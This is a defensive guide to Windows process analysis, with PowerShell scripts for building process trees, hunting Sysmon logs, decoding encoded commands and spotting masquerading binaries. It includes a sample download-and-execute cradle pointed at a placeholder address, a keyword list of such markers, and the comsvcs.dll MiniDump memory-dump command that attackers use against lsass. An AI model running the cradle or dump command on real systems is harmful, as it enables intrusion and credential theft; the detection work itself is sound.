Windows Processes: Blue Team Guide for Detection and Analysis
Windows processes are at the heart of everything the operating system does — from system services to user applications. For defenders, analyzing processes is one of the fastest ways to spot anomalies, detect intrusions, and understand attacker activity.
Understanding Windows Processes
A process is an instance of a running program that contains code, data, handles, and allocated system resources. Each process has a PID (Process ID), a parent PID recorded at creation (the parent may exit later and its PID can be reused, so a parent link is only trustworthy while the parent is still running and is older than the child), and a security context (the user account and token it runs under).
Why Blue Teams Care
- Persistence detection - Attackers often hide backdoors inside legitimate processes.
- Lateral movement - Malicious tools may run under svchost.exe or explorer.exe to blend in.
- Privilege escalation - Suspicious child processes of SYSTEM-owned services can indicate a breach.
Key Tools for Process Analysis on Windows
Task Manager
- Quick view of running processes (Ctrl + Shift + Esc).
- Useful for initial triage but limited detail.
Process Explorer (Sysinternals, procexp.exe)
- Shows full parent-child relationships.
- Can verify process signatures (Options > Verify Image Signatures).
- Flags processes with no valid company name or unsigned binaries.
Command-Line Tools
List processes:
Get-Process
tasklist /v
Detailed process info (Get-CimInstance is the supported replacement for the deprecated Get-WmiObject):
Get-CimInstance Win32_Process | Select-Object ProcessId,ParentProcessId,Name,CommandLine
Sort by PID with image path and start time (Get-Process in Windows PowerShell 5.1 does not expose the parent PID, so this is a flat list, not a tree; a real tree needs the ParentProcessId field from Win32_Process or Process Explorer):
Get-Process | Sort-Object -Property Id | Format-Table Id, ProcessName, Path, StartTime
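Because Get-Process does not carry the parent PID, a real tree has to be built from Win32_Process. The script below is an added example, not code from the original page; it reads only live process data and assumes nothing beyond a Windows host with the CIM cmdlets (Windows PowerShell 5.1 or later). It also handles the PID-reuse case: a "parent" that is younger than its "child" is not the real parent, so the child is printed as a root instead.

```powershell
# Added example, not code from the original page: a parent/child process tree
# built from Win32_Process (which exposes ParentProcessId and CommandLine, unlike
# Get-Process in Windows PowerShell 5.1). Read-only; run it as-is on the live host.

function Get-ProcessTree {
    [CmdletBinding()]
    param(
        # Print only the subtree under this PID; omit to print every tree.
        [int]$RootPid = -1
    )

    # Get-CimInstance is the supported replacement for the deprecated Get-WmiObject.
    $procs = @(Get-CimInstance -ClassName Win32_Process)
    $byPid = @{}
    foreach ($p in $procs) { $byPid[[int]$p.ProcessId] = $p }

    # A parent link is trustworthy only if the parent still exists and was created
    # before the child. Otherwise the parent PID has been reused by a newer process,
    # and blindly following it would draw a false parent/child relationship.
    function Test-ValidParent([object]$p) {
        $pp = [int]$p.ParentProcessId
        if ($pp -eq 0 -or -not $byPid.ContainsKey($pp)) { return $false }
        $parent = $byPid[$pp]
        if ($parent.CreationDate -and $p.CreationDate -and $parent.CreationDate -gt $p.CreationDate) { return $false }
        return $true
    }

    # Group children by (validated) parent PID for direct lookup while walking the tree.
    $children = @{}
    foreach ($p in $procs) {
        if (Test-ValidParent $p) {
            $pp = [int]$p.ParentProcessId
            if (-not $children.ContainsKey($pp)) { $children[$pp] = @() }
            $children[$pp] += $p
        }
    }

    function Write-Node([object]$proc, [int]$depth, [hashtable]$visited) {
        $id = [int]$proc.ProcessId
        if ($visited.ContainsKey($id)) { return }     # loop guard (PID 0 is its own parent)
        $visited[$id] = $true
        # CommandLine is empty for processes the caller cannot open (other users' processes without elevation).
        $cmd = if ($proc.CommandLine) { $proc.CommandLine } else { '<command line not readable>' }
        '{0}{1} [PID {2}, parent {3}] {4}' -f ('  ' * $depth), $proc.Name, $id, $proc.ParentProcessId, $cmd
        foreach ($c in $children[$id]) { Write-Node $c ($depth + 1) $visited }
    }

    $visited = @{}
    if ($RootPid -ge 0) {
        if ($byPid.ContainsKey($RootPid)) { Write-Node $byPid[$RootPid] 0 $visited }
        else { Write-Warning "PID $RootPid not found" }
        return
    }
    # Roots: PID 0/4, orphans whose parent has exited, and children of a reused parent PID.
    foreach ($r in ($procs | Where-Object { -not (Test-ValidParent $_) })) {
        Write-Node $r 0 $visited
    }
}

Get-ProcessTree
```

Run it elevated to see command lines for every user's processes. During triage, `Get-ProcessTree -RootPid <PID>` on a suspicious winword.exe or svchost.exe shows everything that descended from it, which is the same chain a Sysmon Event ID 1 hunt reconstructs from logs.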
Common Attacker Behaviors to Watch
Process Injection
- Malicious code executing inside a legitimate process, either injected into its memory or loaded as a DLL from a path the attacker controls.
- Example: rundll32.exe loading a DLL from a user-writable path such as %TEMP% or %APPDATA%.
Detection (lists processes with a module loaded from a Temp directory; module enumeration of protected or other users' processes fails unless you run elevated, and code injected without a backing file on disk will not appear here):
Get-Process | Where-Object { $_.Modules.FileName -like "*\Temp\*" } |
    Select-Object Id, ProcessName, @{ n = 'TempModules'; e = { ($_.Modules.FileName -like "*\Temp\*") -join '; ' } }
or use Sysmon Event ID 7 (image loaded) for the file-backed case and Event IDs 8 (CreateRemoteThread) and 10 (process access) for injection into another process.
Parent-Child Mismatch
- Example: powershell.exe spawned by winword.exe.
- Common in phishing payloads.
Detection with Sysmon:
- Event ID 1 (process creation)
- Look for:
ParentImage: winword.exe
Image: powershell.exe
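As an added example (not the page's own code), the following turns that Sysmon filter into a hunt: it reads Event ID 1 records, indexes the EventData fields by name, and reports any Office parent that spawned a script host or LOLBin. The parent and child name lists are this example's assumptions; tune them to your environment.

```powershell
# Added example, not code from the original page: hunt Sysmon Event ID 1 for
# Office applications spawning script hosts and LOLBins. The parent and child
# name lists are this example's assumptions, not an exhaustive catalogue.

function Find-OfficeSpawnedScriptHost {
    param(
        # Reads the live Sysmon channel by default; pass exported events
        # (e.g. from Get-WinEvent -Path .\sysmon.evtx) to hunt offline.
        [object[]]$Events,
        [int]$MaxEvents = 10000
    )

    $officeParents  = @('winword.exe','excel.exe','powerpnt.exe','outlook.exe','msaccess.exe','onenote.exe')
    $scriptChildren = @('powershell.exe','pwsh.exe','cmd.exe','wscript.exe','cscript.exe','mshta.exe',
                        'rundll32.exe','regsvr32.exe','certutil.exe','bitsadmin.exe','msiexec.exe')

    if (-not $Events) {
        $Events = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } `
                               -MaxEvents $MaxEvents -ErrorAction Stop
    }

    foreach ($e in $Events) {
        # Sysmon writes each field as <Data Name="...">value</Data>; index them by name
        # instead of regex-matching the rendered Message text.
        $xml = [xml]$e.ToXml()
        $d = @{}
        foreach ($n in $xml.Event.EventData.Data) { $d[$n.Name] = [string]$n.'#text' }

        $image  = [IO.Path]::GetFileName([string]$d['Image']).ToLower()
        $parent = [IO.Path]::GetFileName([string]$d['ParentImage']).ToLower()

        if ($officeParents -contains $parent -and $scriptChildren -contains $image) {
            [PSCustomObject]@{
                Time              = $e.TimeCreated
                User              = $d['User']
                Parent            = $parent
                ParentCommandLine = $d['ParentCommandLine']
                Child             = $image
                CommandLine       = $d['CommandLine']
                ProcessGuid       = $d['ProcessGuid']   # pivot key for the child's Event ID 3/7/11 records
            }
        }
    }
}

Find-OfficeSpawnedScriptHost | Format-List
```

Matching on file names rather than full paths is deliberate: an attacker who copies winword.exe or powershell.exe elsewhere keeps the name, and the path mismatch is a separate finding. The ProcessGuid is stable across PID reuse, so use it, not the PID, when you follow the child into network (ID 3), image-load (ID 7) and file-create (ID 11) events.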
Suspicious Command Lines
- Long Base64-encoded strings in PowerShell (-EncodedCommand and its abbreviations -e, -ec, -enc), usually combined with -nop, -w hidden or -ExecutionPolicy Bypass.
- Unusual flags for cmd.exe, for example /c chaining several commands or launching a script host from a user-writable directory.
Check recent PowerShell activity:
Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" |
Where-Object { $_.Message -match "-enc" }
The encoded string travels on the host process's command line, so Sysmon Event ID 1 and Security Event ID 4688 (with command-line auditing enabled) are the reliable places to find it; the PowerShell/Operational log's Event ID 4104 records the decoded script block, i.e. what actually ran.
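Finding the flag is only half the job; the analyst wants the decoded text. The block below is an added example, not code from the original page: it extracts the Base64 payload from any -EncodedCommand spelling, decodes it as the UTF-16LE text powershell.exe expects, and scores it against a small list of download-and-execute markers. The marker list, the sample command lines and the 192.0.2.10 address are constructed for the example.

```powershell
# Added example, not code from the original page: decode -EncodedCommand payloads
# (and their -e/-ec/-enc abbreviations) and score them for download-cradle tells.
# The marker list, sample command lines and 192.0.2.10 are constructed test data.

# Markers that rarely appear together in legitimate one-liners; extend as needed.
$SuspiciousMarkers = @(
    'IEX', 'Invoke-Expression', 'DownloadString', 'DownloadFile', 'Net.WebClient',
    'Invoke-WebRequest', 'FromBase64String', 'Start-BitsTransfer', '-nop', '-w hidden', 'Bypass'
)

function ConvertTo-EncodedCommand {
    # Builds the payload the same way attackers do; used here only to construct test input.
    param([Parameter(Mandatory)][string]$Script)
    [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Script))
}

function Test-EncodedCommandLine {
    param([Parameter(Mandatory)][string]$CommandLine)

    # Matches -e, -ec, -en, -enc, -EncodedCommand; does not match -ExecutionPolicy or -ep.
    $m = [regex]::Match($CommandLine, '(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})')
    if (-not $m.Success) { return $null }

    try {
        # powershell.exe decodes the Base64 as UTF-16LE, so decode it the same way.
        $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($m.Groups[1].Value))
    } catch {
        # Truncated or tampered Base64 is itself worth a look.
        return [PSCustomObject]@{ CommandLine = $CommandLine; Decoded = $null; Hits = @('undecodable Base64'); Score = 1 }
    }

    # Score the outer flags (-nop, -w hidden) together with the decoded script text.
    $text = "$CommandLine $decoded"
    $hits = @($SuspiciousMarkers | Where-Object { $text -match [regex]::Escape($_) })
    [PSCustomObject]@{ CommandLine = $CommandLine; Decoded = $decoded; Hits = $hits; Score = $hits.Count }
}

# Constructed samples: a plain invocation, a download cradle, and a benign encoded command.
$samples = @(
    'powershell.exe -NoProfile -Command Get-Date',
    'powershell.exe -nop -w hidden -enc ' + (ConvertTo-EncodedCommand 'IEX (New-Object Net.WebClient).DownloadString("http://192.0.2.10/a.ps1")'),
    'powershell.exe -EncodedCommand ' + (ConvertTo-EncodedCommand 'Get-ChildItem C:\Temp | Measure-Object')
)

foreach ($s in $samples) {
    $r = Test-EncodedCommandLine -CommandLine $s
    if ($null -eq $r) { "no encoded command : $s"; continue }
    "score {0} ({1})`n  decoded: {2}" -f $r.Score, ($r.Hits -join ', '), $r.Decoded
}
```

On a live host, feed it real command lines with `Get-CimInstance Win32_Process | ForEach-Object { if ($_.CommandLine) { Test-EncodedCommandLine $_.CommandLine } }`, or the CommandLine field from Sysmon Event ID 1. A score of 0 on a decoded command is not a clean bill of health (the sample benign command decodes fine and scores 0, but so would a cradle that uses a marker not on the list); the decoded text is what the analyst should read.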
Real-World Examples
Example 1: Malicious Word Macro
- User opens a malicious macro-enabled document (.docm or legacy .doc; a plain .docx cannot carry a macro).
- Word spawns powershell.exe with an encoded payload.
- Defender sees this chain in Sysmon logs and stops it before the C2 connection is made.
Example 2: Persistence in svchost.exe
- Attacker installs a malicious service.
- Service runs as svchost.exe but from a non-standard path (the genuine binary lives in C:\Windows\System32).
- Process Explorer reveals the binary is unsigned and located in %APPDATA%.
Advanced Tools for Blue Teams
- Sysinternals Process Monitor (Procmon) - Detailed file/registry/network activity.
- Sysmon - Persistent logging of process creation, image loading, and network connections.
- Velociraptor - Endpoint visibility for threat hunting.
- Windows Event Viewer - Logs in the Security and Microsoft-Windows-Sysmon/Operational channels.
Command & Script Cheat Sheet
List processes with network connections:
Get-NetTCPConnection | ForEach-Object {
    # PID 0 and already-exited processes return nothing; avoid a terminating error.
    $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
    [PSCustomObject]@{
        ProcessName = if ($proc) { $proc.ProcessName } else { 'unknown' }
        PID         = $_.OwningProcess
        Path        = $proc.Path
        State       = $_.State
        LocalPort   = $_.LocalPort
        RemoteIP    = $_.RemoteAddress
        RemotePort  = $_.RemotePort
    }
} | Sort-Object ProcessName, RemoteIP
Find unsigned binaries (skip processes whose path is hidden from the caller, otherwise Get-AuthenticodeSignature errors on an empty path):
Get-Process | Where-Object {
    $_.Path -and (Get-AuthenticodeSignature $_.Path).Status -ne 'Valid'
} | Select-Object Id, ProcessName, Path
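Example 2 above and the signature check here both come down to the same question: is this image where a Windows binary of that name should be, and is it signed by whom it claims? The following is an added example (not the page's own script) that answers both for every running process. The list of core binary names, the trusted directories and the "O=Microsoft Corporation" subject check are this example's assumptions.

```powershell
# Added example, not code from the original page: flag processes that masquerade
# as core Windows binaries (right name, wrong directory), run from user-writable
# locations, or carry an invalid or non-Microsoft signature on a Windows name.

function Find-MasqueradingProcess {
    param(
        # Binaries that must live under the Windows directory; extend for your estate.
        [string[]]$SystemNames = @('svchost.exe','lsass.exe','csrss.exe','services.exe','winlogon.exe',
                                   'smss.exe','wininit.exe','explorer.exe','spoolsv.exe','dllhost.exe',
                                   'rundll32.exe','taskhostw.exe'),
        [string[]]$TrustedDirs = @("$env:SystemRoot\System32", "$env:SystemRoot\SysWOW64", $env:SystemRoot)
    )
    # Only the current user's profile directories are known here; run elevated and
    # add other users' profiles if you need full coverage.
    $userWritable = @($env:TEMP, $env:APPDATA, $env:LOCALAPPDATA, $env:PUBLIC) | Where-Object { $_ }

    foreach ($p in Get-CimInstance -ClassName Win32_Process) {
        $path = $p.ExecutablePath
        if (-not $path) { continue }   # protected processes hide their path from non-admins
        $name = [IO.Path]::GetFileName($path).ToLower()
        $dir  = [IO.Path]::GetDirectoryName($path)
        $reasons = @()

        if ($SystemNames -contains $name -and -not ($TrustedDirs | Where-Object { $dir -ieq $_ })) {
            $reasons += "Windows binary name outside the Windows directory ($dir)"
        }
        foreach ($u in $userWritable) {
            if ($path.StartsWith($u, [StringComparison]::OrdinalIgnoreCase)) {
                $reasons += "runs from user-writable location ($u)"
            }
        }

        # Authenticode check on the file behind the process, not on what is mapped in memory.
        $sig = Get-AuthenticodeSignature -FilePath $path -ErrorAction SilentlyContinue
        if (-not $sig -or $sig.Status -ne 'Valid') {
            $reasons += "signature status: $(if ($sig) { $sig.Status } else { 'unreadable' })"
        } elseif ($SystemNames -contains $name -and $sig.SignerCertificate.Subject -notmatch 'O=Microsoft Corporation') {
            $reasons += "Windows binary name signed by $($sig.SignerCertificate.Subject)"
        }

        if ($reasons.Count -gt 0) {
            [PSCustomObject]@{ PID = $p.ProcessId; Name = $name; Path = $path; Reasons = ($reasons -join '; ') }
        }
    }
}

Find-MasqueradingProcess | Format-Table -AutoSize -Wrap
```

A core Windows name outside the Windows directory, or a Windows name signed by a non-Microsoft publisher, deserves immediate attention. "signature status: NotSigned" on its own is a lead rather than a verdict: some legitimate third-party software ships unsigned, and on older PowerShell versions catalog-signed Windows files can report NotSigned. The check also says nothing about code injected into a validly signed process; that is what the Sysmon Event ID 8/10 telemetry is for.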
Dump suspicious process memory (live forensics; needs an elevated prompt with SeDebugPrivilege, and because attackers use the same comsvcs.dll MiniDump technique against lsass.exe most EDR products alert on it, so run it knowingly or use Sysinternals procdump -ma <PID> instead):
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <PID> C:\dump.dmp full
Pro Tips for Deeper Analysis
- Always correlate process creation with command line arguments.
- Check creation timestamps — a burst of processes at odd hours is a red flag.
- Match PIDs with network connections to find hidden RATs.
- Baseline normal processes for each host and compare regularly.
- Use ELK, Splunk, or Sentinel to hunt process anomalies across the enterprise.
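Baselining is only useful if the comparison is mechanical. The block below is an added example, not code from the original page: it snapshots every running image (path plus signer thumbprint) into JSON and reports what a later snapshot contains that the baseline did not. The baseline location under %ProgramData% and the choice of fields are this example's assumptions.

```powershell
# Added example, not code from the original page: snapshot the running processes
# (image path plus Authenticode signer) into JSON and diff a later snapshot against
# it. The baseline path and the snapshot fields are this example's choices.

function Get-ProcessSnapshot {
    # One record per distinct image path; CIM exposes ExecutablePath where
    # Get-Process's Path is hidden for some processes.
    $seen = @{}
    foreach ($p in Get-CimInstance -ClassName Win32_Process) {
        $path = $p.ExecutablePath
        if (-not $path -or $seen.ContainsKey($path.ToLower())) { continue }
        $seen[$path.ToLower()] = $true
        $sig = Get-AuthenticodeSignature -FilePath $path -ErrorAction SilentlyContinue
        [PSCustomObject]@{
            Name   = $p.Name.ToLower()
            Path   = $path.ToLower()
            Status = if ($sig) { [string]$sig.Status } else { 'Unknown' }
            Signer = if ($sig -and $sig.SignerCertificate) { $sig.SignerCertificate.Thumbprint } else { '' }
        }
    }
}

function Save-ProcessBaseline {
    param([string]$Path = "$env:ProgramData\ProcBaseline\$env:COMPUTERNAME.json")
    New-Item -ItemType Directory -Force -Path (Split-Path -Parent $Path) | Out-Null
    Get-ProcessSnapshot | ConvertTo-Json -Depth 2 | Set-Content -Path $Path -Encoding UTF8
    "baseline written to $Path"
}

function Compare-ProcessBaseline {
    param([string]$Path = "$env:ProgramData\ProcBaseline\$env:COMPUTERNAME.json")
    $baseline = @(Get-Content -Path $Path -Raw | ConvertFrom-Json)
    # Key on path + signer thumbprint so a binary replaced in place with a
    # differently signed (or unsigned) file shows up even though the path is known.
    $known = @{}
    foreach ($b in $baseline) { $known["$($b.Path)|$($b.Signer)"] = $true }

    foreach ($cur in Get-ProcessSnapshot) {
        $key = "$($cur.Path)|$($cur.Signer)"
        if (-not $known.ContainsKey($key)) {
            $finding = $(if ($baseline.Path -contains $cur.Path) { 'known path, different signer' } else { 'new image path' })
            $cur | Add-Member -NotePropertyName Finding -NotePropertyValue $finding -PassThru
        }
    }
}

# Usage: run Save-ProcessBaseline once on a known-clean host, then run
# Compare-ProcessBaseline on a schedule (or after an alert) and review the findings.
Compare-ProcessBaseline | Format-Table -AutoSize
```

Keep a copy of the baseline off the host (a share the host cannot write to, or your SIEM): a baseline that an attacker with local admin can edit proves nothing. Per-host baselines are the point; a hash of "normal" for a build server looks nothing like one for a finance workstation, and comparing across roles only produces noise.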
Windows Process Hunting Cheat Sheet
Basic Process Enumeration
tasklist /v                      # List processes with details
Get-Process                      # PowerShell equivalent
Get-CimInstance Win32_Process    # Full process info (PID, parent PID, path, command line); supersedes the deprecated Get-WmiObject
Detect Suspicious Parent-Child Chains
Get-CimInstance Win32_Process |
Select-Object ProcessId,ParentProcessId,Name,CommandLine |
Sort-Object ParentProcessId
Red Flags
- winword.exe → powershell.exe
- explorer.exe spawning cmd.exe or mshta.exe (explorer.exe → cmd.exe is normal when a user opens a console, so judge it by the command line; mshta.exe pointed at a remote URL or a file under %TEMP% is rarely legitimate)
Find Encoded PowerShell Commands
Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" |
Where-Object { $_.Message -match "-enc" }
Check Binary Signatures
Get-Process | Where-Object {
    $_.Path -and (Get-AuthenticodeSignature $_.Path).Status -ne 'Valid'
}
List Processes with Network Connections
Get-NetTCPConnection | ForEach-Object {
    # PID 0 and already-exited processes return nothing; avoid a terminating error.
    $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
    [PSCustomObject]@{
        ProcessName = if ($proc) { $proc.ProcessName } else { 'unknown' }
        PID         = $_.OwningProcess
        Path        = $proc.Path
        State       = $_.State
        LocalPort   = $_.LocalPort
        RemoteIP    = $_.RemoteAddress
        RemotePort  = $_.RemotePort
    }
} | Sort-Object ProcessName, RemoteIP
Detect Process Injection
Use Sysmon Event ID 7 (Image Loaded) to spot DLLs in unexpected locations:
- %TEMP%
- %APPDATA%
- Non-Windows directories
Event ID 7 only sees file-backed loads; injection into another process's memory shows up as Event ID 8 (CreateRemoteThread) and Event ID 10 (ProcessAccess) from the injecting process.
Dump Suspicious Process Memory
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <PID> C:\dump.dmp full
(Requires SeDebugPrivilege and usually triggers EDR alerts. The result is a single-process minidump, which you open in WinDbg or a similar debugger; Volatility expects a full physical-memory image, not a per-process dump.)
Hunting Mindset
- Baseline first — know what's normal for the system.
- Look for spikes in process creation during off-hours.
- Correlate process events with network, registry, and file changes.
- Use Sysmon for rich telemetry: Event IDs 1 (process create), 3 (network connection), 7 (image load), 8 (CreateRemoteThread), 10 (process access).